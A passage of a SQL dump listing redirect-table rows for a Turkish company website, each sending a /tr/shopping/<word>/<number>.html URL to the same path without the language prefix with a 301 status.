06:36:06','0000-00-00 00:00:00',301),(74418,'https://3s-technologies.com.tr/tr/shopping/aneurysm/4267514953.html',NULL,'https://3s-technologies.com.tr/shopping/aneurysm/4267514953.html','',1,0,'2026-06-11 06:36:09','0000-00-00 00:00:00',301),(74419,'https://3s-technologies.com.tr/tr/shopping/marten/2488484155.html',NULL,'https://3s-technologies.com.tr/shopping/marten/2488484155.html','',1,0,'2026-06-11 06:36:12','0000-00-00 00:00:00',301),(74420,'https://3s-technologies.com.tr/tr/shopping/amphigean/2364663274.html',NULL,'https://3s-technologies.com.tr/shopping/amphigean/2364663274.html','',1,0,'2026-06-11 06:36:15','0000-00-00 00:00:00',301),(74421,'https://3s-technologies.com.tr/tr/shopping/wigwagged/3150332276.html',NULL,'https://3s-technologies.com.tr/shopping/wigwagged/3150332276.html','',1,0,'2026-06-11 06:36:18','0000-00-00 00:00:00',301),(74422,'https://3s-technologies.com.tr/tr/shopping/avale/2698101832.html',NULL,'https://3s-technologies.com.tr/shopping/avale/2698101832.html','',1,0,'2026-06-11 06:36:21','0000-00-00 00:00:00',301),(74423,'https://3s-technologies.com.tr/tr/shopping/severy/2237504349.html',NULL,'https://3s-technologies.com.tr/shopping/severy/2237504349.html','',1,0,'2026-06-11 06:36:24','0000-00-00 00:00:00',301),(74424,'https://3s-technologies.com.tr/tr/shopping/curruca/317095457.html',NULL,'https://3s-technologies.com.tr/shopping/curruca/317095457.html','',1,0,'2026-06-11 06:36:27','0000-00-00 00:00:00',301),(74425,'https://3s-technologies.com.tr/tr/shopping/ineptus/3002089395.html',NULL,'https://3s-technologies.com.tr/shopping/ineptus/3002089395.html','',1,0,'2026-06-11 06:36:37','0000-00-00 00:00:00',301),(74426,'https://3s-technologies.com.tr/tr/shopping/oxytonical/3722125294.html',NULL,'https://3s-technologies.com.tr/shopping/oxytonical/3722125294.html','',1,0,'2026-06-11 06:36:40','0000-00-00 00:00:00',301),(74427,'https://3s-technologies.com.tr/tr/shopping/rehearsing/2747828137.html',NULL,'https://3s-technologies.com.tr/shopping/rehearsing/2747828137.html','',1,0,'2026-06-11 06:36:44','0000-00-00 00:00:00',301),(74428,'https://3s-technologies.com.tr/tr/shopping/insole/1829059640.html',NULL,'https://3s-technologies.com.tr/shopping/insole/1829059640.html','',1,0,'2026-06-11 06:36:46','0000-00-00 00:00:00',301),(74429,'https://3s-technologies.com.tr/tr/shopping/mooncalf/359239831.html',NULL,'https://3s-technologies.com.tr/shopping/mooncalf/359239831.html','',1,0,'2026-06-11 06:36:50','0000-00-00 00:00:00',301),(74430,'https://3s-technologies.com.tr/tr/shopping/petworth/4147887366.html',NULL,'https://3s-technologies.com.tr/shopping/petworth/4147887366.html','',1,0,'2026-06-11 06:36:52','0000-00-00 00:00:00',301),(74431,'https://3s-technologies.com.tr/tr/shopping/zaffar/3783394618.html',NULL,'https://3s-technologies.com.tr/shopping/zaffar/3783394618.html','',1,0,'2026-06-11 06:36:55','0000-00-00 00:00:00',301),(74432,'https://3s-technologies.com.tr/tr/shopping/legislatorship/3112689121.html',NULL,'https://3s-technologies.com.tr/shopping/legislatorship/3112689121.html','',1,0,'2026-06-11 06:37:05','0000-00-00 00:00:00',301),(74433,'https://3s-technologies.com.tr/tr/shopping/counseled/1827366181.html',NULL,'https://3s-technologies.com.tr/shopping/counseled/1827366181.html','',1,0,'2026-06-11 06:37:09','0000-00-00 00:00:00',301),(74434,'https://3s-technologies.com.tr/tr/shopping/niggardly/66262916.html',NULL,'https://3s-technologies.com.tr/shopping/niggardly/66262916.html','',1,0,'2026-06-11 06:37:12','0000-00-00 00:00:00',301),(74435,'https://3s-technologies.com.tr/tr/shopping/melancholy/2040483989.html',NULL,'https://3s-technologies.com.tr/shopping/melancholy/2040483989.html','',1,0,'2026-06-11 06:37:15','0000-00-00 00:00:00',301),(74436,'https://3s-technologies.com.tr/tr/shopping/iodothyrin/56921817.html',NULL,'https://3s-technologies.com.tr/shopping/iodothyrin/56921817.html','',1,0,'2026-06-11 06:37:18','0000-00-00 00:00:00',301),(74437,'https://3s-technologies.com.tr/tr/shopping/saddletree/4211960272.html',NULL,'https://3s-technologies.com.tr/shopping/saddletree/4211960272.html','',1,0,'2026-06-11 06:37:21','0000-00-00 00:00:00',301),(74438,'https://3s-technologies.com.tr/tr/shopping/yankee/193583042.html',NULL,'https://3s-technologies.com.tr/shopping/yankee/193583042.html','',1,0,'2026-06-11 06:37:24','0000-00-00 00:00:00',301),(74439,'https://3s-technologies.com.tr/tr/shopping/lumpish/242220822.html',NULL,'https://3s-technologies.com.tr/shopping/lumpish/242220822.html','',1,0,'2026-06-11 06:37:27','0000-00-00 00:00:00',301),(74440,'https://3s-technologies.com.tr/tr/shopping/garde/232159421.html',NULL,'https://3s-technologies.com.tr/shopping/garde/232159421.html','',1,0,'2026-06-11 06:37:30','0000-00-00 00:00:00',301),(74441,'https://3s-technologies.com.tr/tr/shopping/predestine/1798036506.html',NULL,'https://3s-technologies.com.tr/shopping/predestine/1798036506.html','',1,0,'2026-06-11 06:37:33','0000-00-00 00:00:00',301),(74442,'https://3s-technologies.com.tr/tr/shopping/respondent/1059800381.html',NULL,'https://3s-technologies.com.tr/shopping/respondent/1059800381.html','',1,0,'2026-06-11 06:37:36','0000-00-00 00:00:00',301),(74443,'https://3s-technologies.com.tr/tr/shopping/ribwort/842330834.html',NULL,'https://3s-technologies.com.tr/shopping/ribwort/842330834.html','',1,0,'2026-06-11 06:37:39','0000-00-00 00:00:00',301),(74444,'https://3s-technologies.com.tr/tr/shopping/priestism/1124838899.html',NULL,'https://3s-technologies.com.tr/shopping/priestism/1124838899.html','',1,0,'2026-06-11 06:37:42','0000-00-00 00:00:00',301),(74445,'https://3s-technologies.com.tr/tr/shopping/exsiccated/19278646.html',NULL,'https://3s-technologies.com.tr/shopping/exsiccated/19278646.html','',1,0,'2026-06-11 06:37:45','0000-00-00 00:00:00',301),(74446,'https://3s-technologies.com.tr/tr/shopping/gonidia/1141651495.html',NULL,'https://3s-technologies.com.tr/shopping/gonidia/1141651495.html','',1,0,'2026-06-11 06:37:48','0000-00-00 00:00:00',301),(74447,'https://3s-technologies.com.tr/tr/shopping/rupicoline/2559570031.html',NULL,'https://3s-technologies.com.tr/shopping/rupicoline/2559570031.html','',1,0,'2026-06-11 06:37:51','0000-00-00 00:00:00',301),(74448,'https://3s-technologies.com.tr/tr/shopping/bellied/3570252971.html',NULL,'https://3s-technologies.com.tr/shopping/bellied/3570252971.html','',1,0,'2026-06-11 06:37:54','0000-00-00 00:00:00',301),(74449,'https://3s-technologies.com.tr/tr/shopping/humidness/738084901.html',NULL,'https://3s-technologies.com.tr/shopping/humidness/738084901.html','',1,0,'2026-06-11 06:37:57','0000-00-00 00:00:00',301),(74450,'https://3s-technologies.com.tr/tr/shopping/stopping/366078579.html',NULL,'https://3s-technologies.com.tr/shopping/stopping/366078579.html','',1,0,'2026-06-11 06:38:00','0000-00-00 00:00:00',301),(74451,'https://3s-technologies.com.tr/tr/shopping/deprecating/3637104888.html',NULL,'https://3s-technologies.com.tr/shopping/deprecating/3637104888.html','',1,0,'2026-06-11 06:38:03','0000-00-00 00:00:00',301),(74452,'https://3s-technologies.com.tr/tr/shopping/moschatum/1440537532.html',NULL,'https://3s-technologies.com.tr/shopping/moschatum/1440537532.html','',1,0,'2026-06-11 06:38:06','0000-00-00 00:00:00',301),(74453,'https://3s-technologies.com.tr/tr/shopping/galactophagist/2358079608.html',NULL,'https://3s-technologies.com.tr/shopping/galactophagist/2358079608.html','',1,0,'2026-06-11 06:38:14','0000-00-00 00:00:00',301),(74454,'https://3s-technologies.com.tr/tr/shopping/lacertilian/3716917250.html',NULL,'https://3s-technologies.com.tr/shopping/lacertilian/3716917250.html','',1,0,'2026-06-11 06:38:18','0000-00-00 00:00:00',301),(74455,'https://3s-technologies.com.tr/tr/shopping/chlorpromazine/1052050995.html',NULL,'https://3s-technologies.com.tr/shopping/chlorpromazine/1052050995.html','',1,0,'2026-06-11 06:38:21','0000-00-00 00:00:00',301),(74456,'https://3s-technologies.com.tr/tr/shopping/hylotheist/2070377806.html',NULL,'https://3s-technologies.com.tr/shopping/hylotheist/2070377806.html','',1,0,'2026-06-11 06:38:24','0000-00-00 00:00:00',301),(74457,'https://3s-technologies.com.tr/tr/shopping/stellerine/2673272123.html',NULL,'https://3s-technologies.com.tr/shopping/stellerine/2673272123.html','',1,0,'2026-06-11 06:38:27','0000-00-00 00:00:00',301),(74458,'https://3s-technologies.com.tr/tr/shopping/gastriloquy/2997716714.html',NULL,'https://3s-technologies.com.tr/shopping/gastriloquy/2997716714.html','',1,0,'2026-06-11 06:38:30','0000-00-00 00:00:00',301),(74459,'https://3s-technologies.com.tr/tr/shopping/taxidermist/3740236698.html',NULL,'https://3s-technologies.com.tr/shopping/taxidermist/3740236698.html','',1,0,'2026-06-11 06:38:33','0000-00-00 00:00:00',301),(74460,'https://3s-technologies.com.tr/tr/shopping/chopchurch/3974038777.html',NULL,'https://3s-technologies.com.tr/shopping/chopchurch/3974038777.html','',1,0,'2026-06-11 06:38:41','0000-00-00 00:00:00',301),(74461,'https://3s-technologies.com.tr/tr/shopping/oliverian/2805351299.html',NULL,'https://3s-technologies.com.tr/shopping/oliverian/2805351299.html','',1,0,'2026-06-11 06:38:45','0000-00-00 00:00:00',301),(74462,'https://3s-technologies.com.tr/tr/shopping/enorthotrope/1411828205.html',NULL,'https://3s-technologies.com.tr/shopping/enorthotrope/1411828205.html','',1,0,'2026-06-11 06:38:48','0000-00-00 00:00:00',301),(74463,'https://3s-technologies.com.tr/tr/shopping/dermochelyidae/1254290997.html',NULL,'https://3s-technologies.com.tr/shopping/dermochelyidae/1254290997.html','',1,0,'2026-06-11 06:38:51','0000-00-00 00:00:00',301),(74464,'https://3s-technologies.com.tr/tr/shopping/amphiprostylar/2405063878.html',NULL,'https://3s-technologies.com.tr/shopping/amphiprostylar/2405063878.html','',1,0,'2026-06-11 06:38:54','0000-00-00 00:00:00',301),(74465,'https://3s-technologies.com.tr/tr/shopping/cubooctahedron/2220878156.html',NULL,'https://3s-technologies.com.tr/shopping/cubooctahedron/2220878156.html','',1,0,'2026-06-11 06:38:57','0000-00-00 00:00:00',301),(74466,'https://3s-technologies.com.tr/tr/shopping/fujikuroi/1682061356.html',NULL,'https://3s-technologies.com.tr/shopping/fujikuroi/1682061356.html','',1,0,'2026-06-11 06:39:00','0000-00-00 00:00:00',301),(74467,'https://3s-technologies.com.tr/tr/shopping/brewsterite/1298128004.html',NULL,'https://3s-technologies.com.tr/shopping/brewsterite/1298128004.html','',1,0,'2026-06-11 06:39:03','0000-00-00 00:00:00',301),(74468,'https://3s-technologies.com.tr/tr/shopping/neoplasia/3620899165.html',NULL,'https://3s-technologies.com.tr/shopping/neoplasia/3620899165.html','',1,0,'2026-06-11 06:39:06','0000-00-00 00:00:00',301),(74469,'https://3s-technologies.com.tr/tr/shopping/raccoon/908885133.html',NULL,'https://3s-technologies.com.tr/shopping/raccoon/908885133.html','',1,0,'2026-06-11 06:39:09','0000-00-00 00:00:00',301),(74470,'https://3s-technologies.com.tr/tr/shopping/machaerodus/3164988825.html',NULL,'https://3s-technologies.com.tr/shopping/machaerodus/3164988825.html','',1,0,'2026-06-11 06:39:12','0000-00-00 00:00:00',301),(74471,'https://3s-technologies.com.tr/tr/shopping/sportiveness/644217116.html',NULL,'https://3s-technologies.com.tr/shopping/sportiveness/644217116.html','',1,0,'2026-06-11 06:39:15','0000-00-00 00:00:00',301),(74472,'https://3s-technologies.com.tr/tr/shopping/turbellarian/2922428189.html',NULL,'https://3s-technologies.com.tr/shopping/turbellarian/2922428189.html','',1,0,'2026-06-11 06:39:18','0000-00-00 00:00:00',301),(74473,'https://3s-technologies.com.tr/tr/shopping/highlysexed/1462189164.html',NULL,'https://3s-technologies.com.tr/shopping/highlysexed/1462189164.html','',1,0,'2026-06-11 06:39:21','0000-00-00 00:00:00',301),(74474,'https://3s-technologies.com.tr/tr/shopping/refreshed/3432124639.html',NULL,'https://3s-technologies.com.tr/shopping/refreshed/3432124639.html','',1,0,'2026-06-11 06:39:24','0000-00-00 00:00:00',301),(74475,'https://3s-technologies.com.tr/tr/shopping/sanguineolata/1942747718.html',NULL,'https://3s-technologies.com.tr/shopping/sanguineolata/1942747718.html','',1,0,'2026-06-11 06:39:27','0000-00-00 00:00:00',301),(74476,'https://3s-technologies.com.tr/tr/shopping/icelandica/204121934.html',NULL,'https://3s-technologies.com.tr/shopping/icelandica/204121934.html','',1,0,'2026-06-11 06:39:30','0000-00-00 00:00:00',301),(74477,'https://3s-technologies.com.tr/tr/shopping/rumbowline/4041525364.html',NULL,'https://3s-technologies.com.tr/shopping/rumbowline/4041525364.html','',1,0,'2026-06-11 06:39:33','0000-00-00 00:00:00',301),(74478,'https://3s-technologies.com.tr/tr/shopping/antiquateness/3169577629.html',NULL,'https://3s-technologies.com.tr/shopping/antiquateness/3169577629.html','',1,0,'2026-06-11 06:39:36','0000-00-00 00:00:00',301),(74479,'https://3s-technologies.com.tr/tr/shopping/octoedrical/3653003240.html',NULL,'https://3s-technologies.com.tr/shopping/octoedrical/3653003240.html','',1,0,'2026-06-11 06:39:39','0000-00-00 00:00:00',301),(74480,'https://3s-technologies.com.tr/tr/shopping/clytolaema/1117089529.html',NULL,'https://3s-technologies.com.tr/shopping/clytolaema/1117089529.html','',1,0,'2026-06-11 06:39:42','0000-00-00 00:00:00',301),(74481,'https://3s-technologies.com.tr/tr/shopping/ctenoid/2267260180.html',NULL,'https://3s-technologies.com.tr/shopping/ctenoid/2267260180.html','',1,0,'2026-06-11 06:39:50','0000-00-00 00:00:00',301),(74482,'https://3s-technologies.com.tr/tr/shopping/quash/3344440224.html',NULL,'https://3s-technologies.com.tr/shopping/quash/3344440224.html','',1,0,'2026-06-11 06:39:53','0000-00-00 00:00:00',301),(74483,'https://3s-technologies.com.tr/tr/shopping/clathraceae/56372187.html',NULL,'https://3s-technologies.com.tr/shopping/clathraceae/56372187.html','',1,0,'2026-06-11 06:39:56','0000-00-00 00:00:00',301),(74484,'https://3s-technologies.com.tr/tr/shopping/sondeli/231773298.html',NULL,'https://3s-technologies.com.tr/shopping/sondeli/231773298.html','',1,0,'2026-06-11 06:40:01','0000-00-00 00:00:00',301),(74485,'https://3s-technologies.com.tr/tr/shopping/envoyship/535777103.html',NULL,'https://3s-technologies.com.tr/shopping/envoyship/535777103.html','',1,0,'2026-06-11 06:40:03','0000-00-00 00:00:00',301),(74486,'https://3s-technologies.com.tr/tr/shopping/passional/2139970975.html',NULL,'https://3s-technologies.com.tr/shopping/passional/2139970975.html','',1,0,'2026-06-11 06:40:06','0000-00-00 00:00:00',301),(74487,'https://3s-technologies.com.tr/tr/shopping/shakes/3284374892.html',NULL,'https://3s-technologies.com.tr/shopping/shakes/3284374892.html','',1,0,'2026-06-11 06:40:09','0000-00-00 00:00:00',301),(74488,'https://3s-technologies.com.tr/tr/shopping/syphon/1371293766.html',NULL,'https://3s-technologies.com.tr/shopping/syphon/1371293766.html','',1,0,'2026-06-11 06:40:12','0000-00-00 00:00:00',301),(74489,'https://3s-technologies.com.tr/tr/shopping/chausses/1511998554.html',NULL,'https://3s-technologies.com.tr/shopping/chausses/1511998554.html','',1,0,'2026-06-11 06:40:15','0000-00-00 00:00:00',301),(74490,'https://3s-technologies.com.tr/tr/shopping/peucil/2466464343.html',NULL,'https://3s-technologies.com.tr/shopping/peucil/2466464343.html','',1,0,'2026-06-11 06:40:18','0000-00-00 00:00:00',301),(74491,'https://3s-technologies.com.tr/tr/shopping/sapiential/3969328277.html',NULL,'https://3s-technologies.com.tr/shopping/sapiential/3969328277.html','',1,0,'2026-06-11 06:40:26','0000-00-00 00:00:00',301),(74492,'https://3s-technologies.com.tr/tr/shopping/tooted/1044752774.html',NULL,'https://3s-technologies.com.tr/shopping/tooted/1044752774.html','',1,0,'2026-06-11 06:40:28','0000-00-00 00:00:00',301),(74493,'https://3s-technologies.com.tr/tr/shopping/spaceful/769484771.html',NULL,'https://3s-technologies.com.tr/shopping/spaceful/769484771.html','',1,0,'2026-06-11 06:40:31','0000-00-00 00:00:00',301),(74494,'https://3s-technologies.com.tr/tr/shopping/overspread/3552969244.html',NULL,'https://3s-technologies.com.tr/shopping/overspread/3552969244.html','',1,0,'2026-06-11 06:40:34','0000-00-00 00:00:00',301),(74495,'https://3s-technologies.com.tr/tr/shopping/fellon/101923316.html',NULL,'https://3s-technologies.com.tr/shopping/fellon/101923316.html','',1,0,'2026-06-11 06:40:37','0000-00-00 00:00:00',301),(74496,'https://3s-technologies.com.tr/tr/shopping/auratum/1509707333.html',NULL,'https://3s-technologies.com.tr/shopping/auratum/1509707333.html','',1,0,'2026-06-11 06:40:40','0000-00-00 00:00:00',301),(74497,'https://3s-technologies.com.tr/tr/shopping/aesthetican/281136342.html',NULL,'https://3s-technologies.com.tr/shopping/aesthetican/281136342.html','',1,0,'2026-06-11 06:40:43','0000-00-00 00:00:00',301),(74498,'https://3s-technologies.com.tr/tr/shopping/forethoughtful/861905766.html',NULL,'https://3s-technologies.com.tr/shopping/forethoughtful/861905766.html','',1,0,'2026-06-11 06:40:48','0000-00-00 00:00:00',301),(74499,'https://3s-technologies.com.tr/tr/shopping/salpeter/1500444387.html',NULL,'https://3s-technologies.com.tr/shopping/salpeter/1500444387.html','',1,0,'2026-06-11 06:40:52','0000-00-00 00:00:00',301),(74500,'https://3s-technologies.com.tr/tr/shopping/loaning/3857571788.html',NULL,'https://3s-technologies.com.tr/shopping/loaning/3857571788.html','',1,0,'2026-06-11 06:40:55','0000-00-00 00:00:00',301),(74501,'https://3s-technologies.com.tr/tr/shopping/coeruleus/3562365647.html',NULL,'https://3s-technologies.com.tr/shopping/coeruleus/3562365647.html','',1,0,'2026-06-11 06:40:58','0000-00-00 00:00:00',301),(74502,'https://3s-technologies.com.tr/tr/shopping/dicyanide/1967070016.html',NULL,'https://3s-technologies.com.tr/shopping/dicyanide/1967070016.html','',1,0,'2026-06-11 06:41:01','0000-00-00 00:00:00',301),(74503,'https://3s-technologies.com.tr/tr/shopping/flamingoes/1195071306.html',NULL,'https://3s-technologies.com.tr/shopping/flamingoes/1195071306.html','',1,0,'2026-06-11 06:41:04','0000-00-00 00:00:00',301),(74504,'https://3s-technologies.com.tr/tr/shopping/trilateralness/2839970257.html',NULL,'https://3s-technologies.com.tr/shopping/trilateralness/2839970257.html','',1,0,'2026-06-11 06:41:07','0000-00-00 00:00:00',301),(74505,'https://3s-technologies.com.tr/tr/shopping/preterimperfect/118765632.html',NULL,'https://3s-technologies.com.tr/shopping/preterimperfect/118765632.html','',1,0,'2026-06-11 06:41:16','0000-00-00 00:00:00',301),(74506,'https://3s-technologies.com.tr/tr/shopping/socager/2703902735.html',NULL,'https://3s-technologies.com.tr/shopping/socager/2703902735.html','',1,0,'2026-06-11 06:41:17','0000-00-00 00:00:00',301),(74507,'https://3s-technologies.com.tr/tr/shopping/refuter/1642739016.html',NULL,'https://3s-technologies.com.tr/shopping/refuter/1642739016.html','',1,0,'2026-06-11 06:41:21','0000-00-00 00:00:00',301),(74508,'https://3s-technologies.com.tr/tr/shopping/exilis/3087812200.html',NULL,'https://3s-technologies.com.tr/shopping/exilis/3087812200.html','',1,0,'2026-06-11 06:41:23','0000-00-00 00:00:00',301),(74509,'https://3s-technologies.com.tr/tr/shopping/pierreperdu/3435947658.html',NULL,'https://3s-technologies.com.tr/shopping/pierreperdu/3435947658.html','',1,0,'2026-06-11 06:41:27','0000-00-00 00:00:00',301),(74510,'https://3s-technologies.com.tr/tr/shopping/cissus/1187894813.html',NULL,'https://3s-technologies.com.tr/shopping/cissus/1187894813.html','',1,0,'2026-06-11 06:41:29','0000-00-00 00:00:00',301),(74511,'https://3s-technologies.com.tr/tr/shopping/stroll/2739121708.html',NULL,'https://3s-technologies.com.tr/shopping/stroll/2739121708.html','',1,0,'2026-06-11 06:41:33','0000-00-00 00:00:00',301),(74512,'https://3s-technologies.com.tr/tr/shopping/represser/1441172170.html',NULL,'https://3s-technologies.com.tr/shopping/represser/1441172170.html','',1,0,'2026-06-11 06:41:37','0000-00-00 00:00:00',301),(74513,'https://3s-technologies.com.tr/tr/shopping/jippo/210273066.html',NULL,'https://3s-technologies.com.tr/shopping/jippo/210273066.html','',1,0,'2026-06-11 06:41:40','0000-00-00 00:00:00',301),(74514,'https://3s-technologies.com.tr/tr/shopping/saree/738901390.html',NULL,'https://3s-technologies.com.tr/shopping/saree/738901390.html','',1,0,'2026-06-11 06:41:43','0000-00-00 00:00:00',301),(74515,'https://3s-technologies.com.tr/tr/shopping/shaum/2910108269.html',NULL,'https://3s-technologies.com.tr/shopping/shaum/2910108269.html','',1,0,'2026-06-11 06:41:46','0000-00-00 00:00:00',301),(74516,'https://3s-technologies.com.tr/tr/shopping/gummous/2522019056.html',NULL,'https://3s-technologies.com.tr/shopping/gummous/2522019056.html','',1,0,'2026-06-11 06:41:49','0000-00-00 00:00:00',301),(74517,'https://3s-technologies.com.tr/tr/shopping/sojourning/1125664891.html',NULL,'https://3s-technologies.com.tr/shopping/sojourning/1125664891.html','',1,0,'2026-06-11 06:41:52','0000-00-00 00:00:00',301),(74518,'https://3s-technologies.com.tr/tr/shopping/stratocracy/2824356282.html',NULL,'https://3s-technologies.com.tr/shopping/stratocracy/2824356282.html','',1,0,'2026-06-11 06:42:25','0000-00-00 00:00:00',301),(74519,'https://3s-technologies.com.tr/tr/shopping/verge/880855169.html',NULL,'https://3s-technologies.com.tr/shopping/verge/880855169.html','',1,0,'2026-06-11 06:42:28','0000-00-00 00:00:00',301),(74520,'https://3s-technologies.com.tr/tr/shopping/manumitted/28732930.html',NULL,'https://3s-technologies.com.tr/shopping/manumitted/28732930.html','',1,0,'2026-06-11 06:42:31','0000-00-00 00:00:00',301),(74521,'https://3s-technologies.com.tr/tr/shopping/gallinule/662632837.html',NULL,'https://3s-technologies.com.tr/shopping/gallinule/662632837.html','',1,0,'2026-06-11 06:42:34','0000-00-00 00:00:00',301),(74522,'https://3s-technologies.com.tr/tr/shopping/cuminum/4153350508.html',NULL,'https://3s-technologies.com.tr/shopping/cuminum/4153350508.html','',1,0,'2026-06-11 06:42:37','0000-00-00 00:00:00',301),(74523,'https://3s-technologies.com.tr/tr/shopping/aftercrop/37862883.html',NULL,'https://3s-technologies.com.tr/shopping/aftercrop/37862883.html','',1,0,'2026-06-11 06:42:40','0000-00-00 00:00:00',301),(74524,'https://3s-technologies.com.tr/tr/shopping/afford/281522481.html',NULL,'https://3s-technologies.com.tr/shopping/afford/281522481.html','',1,0,'2026-06-11 06:42:56','0000-00-00 00:00:00',301),(74525,'https://3s-technologies.com.tr/tr/shopping/waspishly/2732832606.html',NULL,'https://3s-technologies.com.tr/shopping/waspishly/2732832606.html','',1,0,'2026-06-11 06:42:59','0000-00-00 00:00:00',301),(74526,'https://3s-technologies.com.tr/tr/shopping/incurred/3765694238.html',NULL,'https://3s-technologies.com.tr/shopping/incurred/3765694238.html','',1,0,'2026-06-11 06:43:02','0000-00-00 00:00:00',301),(74527,'https://3s-technologies.com.tr/tr/shopping/zapus/3404262071.html',NULL,'https://3s-technologies.com.tr/shopping/zapus/3404262071.html','',1,0,'2026-06-11 06:43:05','0000-00-00 00:00:00',301),(74528,'https://3s-technologies.com.tr/tr/shopping/loathy/3083586673.html',NULL,'https://3s-technologies.com.tr/shopping/loathy/3083586673.html','',1,0,'2026-06-11 06:43:08','0000-00-00 00:00:00',301),(74529,'https://3s-technologies.com.tr/tr/shopping/pionus/1740045170.html',NULL,'https://3s-technologies.com.tr/shopping/pionus/1740045170.html','',1,0,'2026-06-11 06:43:11','0000-00-00 00:00:00',301),(74530,'https://3s-technologies.com.tr/tr/shopping/shard/1274631640.html',NULL,'https://3s-technologies.com.tr/shopping/shard/1274631640.html','',1,0,'2026-06-11 06:43:18','0000-00-00 00:00:00',301),(74531,'https://3s-technologies.com.tr/tr/shopping/bejape/2153937718.html',NULL,'https://3s-technologies.com.tr/shopping/bejape/2153937718.html','',1,0,'2026-06-11 06:43:21','0000-00-00 00:00:00',301),(74532,'https://3s-technologies.com.tr/tr/shopping/manidae/983571428.html',NULL,'https://3s-technologies.com.tr/shopping/manidae/983571428.html','',1,0,'2026-06-11 06:43:24','0000-00-00 00:00:00',301),(74533,'https://3s-technologies.com.tr/tr/shopping/kerchiefed/1475353298.html',NULL,'https://3s-technologies.com.tr/shopping/kerchiefed/1475353298.html','',1,0,'2026-06-11 06:43:27','0000-00-00 00:00:00',301),(74534,'https://3s-technologies.com.tr/tr/shopping/psychomancy/2230829108.html',NULL,'https://3s-technologies.com.tr/shopping/psychomancy/2230829108.html','',1,0,'2026-06-11 06:43:30','0000-00-00 00:00:00',301),(74535,'https://3s-technologies.com.tr/tr/shopping/bignoniaceous/3394544252.html',NULL,'https://3s-technologies.com.tr/shopping/bignoniaceous/3394544252.html','',1,0,'2026-06-11 06:43:33','0000-00-00 00:00:00',301),(74536,'https://3s-technologies.com.tr/tr/shopping/crane/536518055.html',NULL,'https://3s-technologies.com.tr/shopping/crane/536518055.html','',1,0,'2026-06-11 06:43:37','0000-00-00 00:00:00',301),(74537,'https://3s-technologies.com.tr/tr/shopping/penitenser/881432598.html',NULL,'https://3s-technologies.com.tr/shopping/penitenser/881432598.html','',1,0,'2026-06-11 06:43:40','0000-00-00 00:00:00',301),(74538,'https://3s-technologies.com.tr/tr/shopping/disagree/794582718.html',NULL,'https://3s-technologies.com.tr/shopping/disagree/794582718.html','',1,0,'2026-06-11 06:43:43','0000-00-00 00:00:00',301),(74539,'https://3s-technologies.com.tr/tr/shopping/cosmopolitical/3836621218.html',NULL,'https://3s-technologies.com.tr/shopping/cosmopolitical/3836621218.html','',1,0,'2026-06-11 06:43:46','0000-00-00 00:00:00',301),(74540,'https://3s-technologies.com.tr/tr/shopping/interspersed/607020275.html',NULL,'https://3s-technologies.com.tr/shopping/interspersed/607020275.html','',1,0,'2026-06-11 06:44:20','0000-00-00 00:00:00',301),(74541,'https://3s-technologies.com.tr/tr/shopping/aspired/3184991723.html',NULL,'https://3s-technologies.com.tr/shopping/aspired/3184991723.html','',1,0,'2026-06-11 06:44:23','0000-00-00 00:00:00',301),(74542,'https://3s-technologies.com.tr/tr/shopping/billbeetle/1716506879.html',NULL,'https://3s-technologies.com.tr/shopping/billbeetle/1716506879.html','',1,0,'2026-06-11 06:44:26','0000-00-00 00:00:00',301),(74543,'https://3s-technologies.com.tr/tr/shopping/illminded/1399673991.html',NULL,'https://3s-technologies.com.tr/shopping/illminded/1399673991.html','',1,0,'2026-06-11 06:44:29','0000-00-00 00:00:00',301),(74544,'https://3s-technologies.com.tr/tr/shopping/ponchos/196641878.html',NULL,'https://3s-technologies.com.tr/shopping/ponchos/196641878.html','',1,0,'2026-06-11 06:44:32','0000-00-00 00:00:00',301),(74545,'https://3s-technologies.com.tr/tr/shopping/vafrous/1176630800.html',NULL,'https://3s-technologies.com.tr/shopping/vafrous/1176630800.html','',1,0,'2026-06-11 06:44:38','0000-00-00 00:00:00',301),(74546,'https://3s-technologies.com.tr/tr/shopping/unfrequented/1322347391.html',NULL,'https://3s-technologies.com.tr/shopping/unfrequented/1322347391.html','',1,0,'2026-06-11 06:44:41','0000-00-00 00:00:00',301),(74547,'https://3s-technologies.com.tr/tr/shopping/kibitka/2233656529.html',NULL,'https://3s-technologies.com.tr/shopping/kibitka/2233656529.html','',1,0,'2026-06-11 06:44:44','0000-00-00 00:00:00',301),(74548,'https://3s-technologies.com.tr/tr/shopping/baobab/1626722692.html',NULL,'https://3s-technologies.com.tr/shopping/baobab/1626722692.html','',1,0,'2026-06-11 06:44:47','0000-00-00 00:00:00',301),(74549,'https://3s-technologies.com.tr/tr/shopping/disseisin/718077451.html',NULL,'https://3s-technologies.com.tr/shopping/disseisin/718077451.html','',1,0,'2026-06-11 06:44:50','0000-00-00 00:00:00',301),(74550,'https://3s-technologies.com.tr/tr/shopping/cassivelaunus/4124567918.html',NULL,'https://3s-technologies.com.tr/shopping/cassivelaunus/4124567918.html','',1,0,'2026-06-11 06:44:53','0000-00-00 00:00:00',301),(74551,'https://3s-technologies.com.tr/tr/shopping/padnag/14140212.html',NULL,'https://3s-technologies.com.tr/shopping/padnag/14140212.html','',1,0,'2026-06-11 06:45:01','0000-00-00 00:00:00',301),(74552,'https://3s-technologies.com.tr/tr/shopping/arabum/4055901613.html',NULL,'https://3s-technologies.com.tr/shopping/arabum/4055901613.html','',1,0,'2026-06-11 06:45:10','0000-00-00 00:00:00',301),(74553,'https://3s-technologies.com.tr/tr/shopping/chivalrous/137017973.html',NULL,'https://3s-technologies.com.tr/shopping/chivalrous/137017973.html','',1,0,'2026-06-11 06:45:13','0000-00-00 00:00:00',301),(74554,'https://3s-technologies.com.tr/tr/shopping/restorableness/1452091683.html',NULL,'https://3s-technologies.com.tr/shopping/restorableness/1452091683.html','',1,0,'2026-06-11 06:45:16','0000-00-00 00:00:00',301),(74555,'https://3s-technologies.com.tr/tr/shopping/prelatic/2151609605.html',NULL,'https://3s-technologies.com.tr/shopping/prelatic/2151609605.html','',1,0,'2026-06-11 06:45:19','0000-00-00 00:00:00',301),(74556,'https://3s-technologies.com.tr/tr/shopping/ischiopodite/401471806.html',NULL,'https://3s-technologies.com.tr/shopping/ischiopodite/401471806.html','',1,0,'2026-06-11 06:45:22','0000-00-00 00:00:00',301),(74557,'https://3s-technologies.com.tr/tr/shopping/cameras/2799265177.html',NULL,'https://3s-technologies.com.tr/shopping/cameras/2799265177.html','',1,0,'2026-06-11 06:45:25','0000-00-00 